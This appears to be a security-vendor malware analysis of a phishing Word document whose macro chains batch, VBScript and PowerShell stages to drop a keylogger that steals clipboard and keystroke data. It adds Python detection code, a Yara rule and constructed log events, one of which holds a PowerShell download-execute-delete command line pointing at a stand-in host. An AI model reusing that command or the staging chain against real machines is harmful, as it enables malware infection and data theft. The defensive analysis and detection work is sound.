MS Word and Macros… Now With Social Engineering Malware



On December 11, one of our employees used PhishMe’s Reporter for Outlook to report a phishing email that carried a particularly nasty Word document. The document chains four stages: a VBA macro, a batch file, a VBScript file and a PowerShell script. Here’s a screenshot of the phishing email:

Figure 1 — Screenshot of phishing email

Once opened, the document shows blurred content and asks the recipient to enable macros in order to view it. Nothing is actually hidden behind the blur; the text exists only to talk the user past Office’s default of blocking macros.

Figure 2 — Document requesting that user enable macros

Once macros are enabled, the macro runs a batch script via cmd.exe; the batch script launches a VBScript file, which in turn starts a PowerShell script (Figure 3).

Figure 3 — Chain of execution for Word document

The batch file pings twice (ping is commonly used in batch files as a crude sleep, since cmd.exe has no built-in delay command), switches the console code page to Windows-1251 Cyrillic with chcp 1251, and runs the second stage, adobeacd-update.vbs (Figure 4).

Figure 4 — Batch file executed by macro

Next, the VBS file runs a PowerShell script with the command shown in Figure 5.

Figure 5 — VBS file executing PowerShell script

The PowerShell script is the stage that finally fetches the malware. It first downloads “x.exe” from the highlighted domain and saves it to disk under the name “444.exe”.

Figure 6 — Excerpt of PowerShell script

Next, the script stores the paths of the scripts above in a variable, sleeps for 15 seconds, and runs “444.exe”.

Figure 7 — PowerShell excerpt that executes “444.exe”

Once 444.exe is running, the PowerShell script attempts to cover its tracks by deleting the other scripts that led to its execution.

Figure 8 — Attempted cleanup for the malware
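The lineage described above (an Office application spawning cmd.exe, which spawns a script host, which spawns PowerShell that downloads, sleeps, runs a dropped executable and deletes its own stages) is distinctive in process-creation telemetry. The following Python is an added example written for this post, not code from PhishMe or from the sample: it walks a list of constructed Sysmon-style process events, flags every powershell.exe whose ancestors include a script host, a shell and an Office application in that order, and reports which of the behaviours described above appear in its command line. All PIDs, paths and the download URL in the sample events are invented; only the names adobeacd-update.vbs and 444.exe come from the post.

```python
"""Flag the Office -> cmd.exe -> script host -> PowerShell lineage.

Added example for this post; not code from PhishMe or from the sample.
Events are constructed to resemble Sysmon Event ID 1 (process creation)
records; every PID, path and URL below is invented.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Command-line patterns for what the post describes in the PowerShell stage:
# fetch a file, pause, run an executable from a temp directory, delete the
# scripts that got it there.
PS_INDICATORS = {
    "download": re.compile(r"DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I),
    "sleep": re.compile(r"Start-Sleep|Thread\]::Sleep", re.I),
    "temp_exe": re.compile(r'\\Temp\\[^\s\'"]*\.exe', re.I),
    "cleanup": re.compile(r"Remove-Item|\bdel\b|\berase\b", re.I),
}

TEMP = r"C:\Users\jdoe\AppData\Local\Temp"  # constructed path
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "cmd": r'"WINWORD.EXE" C:\Users\jdoe\Downloads\invoice.doc'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": 'cmd.exe /c "' + TEMP + r'\adobeacd-update.bat"'},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\PING.EXE",
     "cmd": "ping -n 2 127.0.0.1"},
    {"pid": 302, "ppid": 300, "image": r"C:\Windows\System32\chcp.com",
     "cmd": "chcp 1251"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": 'wscript.exe "' + TEMP + r'\adobeacd-update.vbs"'},
    {"pid": 500, "ppid": 400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": ("powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "
             "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe', '"
             + TEMP + r"\444.exe'); Start-Sleep 15; Start-Process '"
             + TEMP + r"\444.exe'; Remove-Item '" + TEMP + r"\adobeacd-update.*'")},
    # Benign PowerShell launched from the desktop, for contrast.
    {"pid": 600, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Process"},
]


def image_name(path):
    """Lower-case file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Record for pid, then its parent, grandparent, ... (stops on cycles)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def stages_in_order(names, stages):
    """True if each stage set is met in turn while walking up the tree.
    Gaps are allowed, so an extra conhost.exe or nested cmd.exe between
    stages does not hide the chain."""
    i = 0
    for name in names:
        if i < len(stages) and name in stages[i]:
            i += 1
    return i == len(stages)


def find_macro_dropper_chains(events):
    """One finding per powershell.exe whose ancestors include a script host,
    then a shell, then an Office application (nearest ancestor first)."""
    hits = []
    for e in events:
        if image_name(e["image"]) != "powershell.exe":
            continue
        chain = ancestry(events, e["pid"])
        parents = [image_name(x["image"]) for x in chain[1:]]
        if not stages_in_order(parents, [SCRIPT_HOSTS, SHELLS, OFFICE_APPS]):
            continue
        hits.append({
            "pid": e["pid"],
            "chain": " -> ".join(image_name(x["image"]) for x in reversed(chain)),
            "indicators": sorted(k for k, rx in PS_INDICATORS.items()
                                 if rx.search(e["cmd"])),
        })
    return hits


if __name__ == "__main__":
    for hit in find_macro_dropper_chains(SAMPLE_EVENTS):
        print(hit["pid"], hit["chain"], hit["indicators"])
```

On the constructed events this reports only PID 500, with the chain explorer.exe -> winword.exe -> cmd.exe -> wscript.exe -> powershell.exe and all four indicators; the PowerShell started directly from the desktop is left alone. The lineage test is the strong signal here: the command-line patterns are easy to obfuscate (encoded commands, string concatenation), while a Word process spawning cmd.exe is rare in most environments regardless of what the command line says.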

Wireshark shows the executable being downloaded (Figure 9).

Figure 9 — Malware being downloaded

The malware is packed, but analyzing its memory still reveals some interesting behaviour. Grepping the memory dump for the string “eu” and looking at the data before and after it shows the malware attempting to POST to “/log/index.php” and sending back data containing the string “0USER0” (Figure 10).

Figure 10 — Memory dump of data being collected

Looking at the pcap (Figure 11) and decoding the POSTed data (Figure 12), we can see the same data as it leaves the host on the wire.

Figure 11 — Data from pcap
Figure 12 — Decoded data from pcap

We can see that the malware is capable of copying the contents of the clipboard as well as logging keystrokes. This data is then POSTed back to the attacker’s domain.

For a Yara signature, note that the attackers’ docx contains a “vbaProject.bin” part, the OLE container that holds the VBA macros inside an Office Open XML file. The following Yara rule helps pick up variants that carry one:

rule PM_docx_with_vba_bin
{
    strings:
        $a1 = "PK"
        $a2 = "word/_rels/vbaProject.bin"
    condition:
        $a1 at 0 and $a2
}

Two caveats when deploying it. The first string is just the ZIP signature that every Office Open XML file starts with, so the rule’s selectivity comes entirely from the second string, which matches as a prefix of “word/_rels/vbaProject.bin.rels”, the relationships part Word writes alongside a VBA project. The rule therefore flags any Word OOXML document carrying a macro project, malicious or legitimate, and it will not match Excel workbooks (whose project lives under “xl/”) or legacy binary .doc files.
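To see what the rule does and does not establish, the following Python is an added example for this post (not PhishMe’s code): it reproduces the rule’s two conditions on raw bytes, then goes one step further by opening the ZIP container and listing the parts that belong to a VBA project, and checking whether [Content_Types].xml declares the application/vnd.ms-office.vbaProject content type that a VBA project part carries in a macro-enabled document. The sample documents are built in memory for the example and are not the original phishing file; the VBA part is a placeholder blob, not a real compiled macro project.

```python
"""Check an Office Open XML document for an embedded VBA project.

Added example for this post, not PhishMe's code. The sample documents are
constructed in memory; the vbaProject.bin content is a placeholder.
"""
import io
import zipfile

VBA_PATH_MARKER = b"word/_rels/vbaProject.bin"
VBA_CONTENT_TYPE = b"application/vnd.ms-office.vbaProject"


def yara_style_match(data):
    """Same test as the Yara rule: 'PK' at offset 0 and the path anywhere."""
    return data[:2] == b"PK" and VBA_PATH_MARKER in data


def vba_parts(data):
    """Names of ZIP entries belonging to a VBA project, or [] if the bytes are
    not a valid ZIP container (a bare string hit is not enough to open it)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return []
    return sorted(n for n in names if "vbaproject.bin" in n.lower())


def declares_vba_content_type(data):
    """True if [Content_Types].xml registers a part as a VBA project."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return VBA_CONTENT_TYPE in zf.read("[Content_Types].xml")
    except (zipfile.BadZipFile, KeyError):
        return False


def build_sample_doc(with_macro):
    """Construct a minimal Word OOXML container (sample input, not a real file)."""
    overrides = ('<Override PartName="/word/document.xml" ContentType="application/'
                 'vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>')
    if with_macro:
        overrides += ('<Override PartName="/word/vbaProject.bin" '
                      'ContentType="application/vnd.ms-office.vbaProject"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/'
                    'content-types">' + overrides + "</Types>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Placeholder standing in for the OLE2 compound file that holds
            # the compressed VBA streams in a real document.
            zf.writestr("word/vbaProject.bin",
                        b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16)
            zf.writestr("word/_rels/vbaProject.bin.rels", "<Relationships/>")
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("macro", build_sample_doc(True)),
                       ("clean", build_sample_doc(False))):
        print(label, yara_style_match(doc), vba_parts(doc),
              declares_vba_content_type(doc))
```

ZIP entry names are stored uncompressed in both the local file headers and the central directory, which is why the rule’s plain string search works even though the part contents are deflated. The difference between the two checks shows up on a blob that merely starts with “PK” and contains the path string: the Yara-style test fires, while the container-based checks return nothing because there is no valid ZIP to open. In a triage pipeline the cheap string rule is the filter and the container parse is the confirmation.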
The Word document has a very low antivirus detection rate (4/56 at the time of analysis) and can be found here:
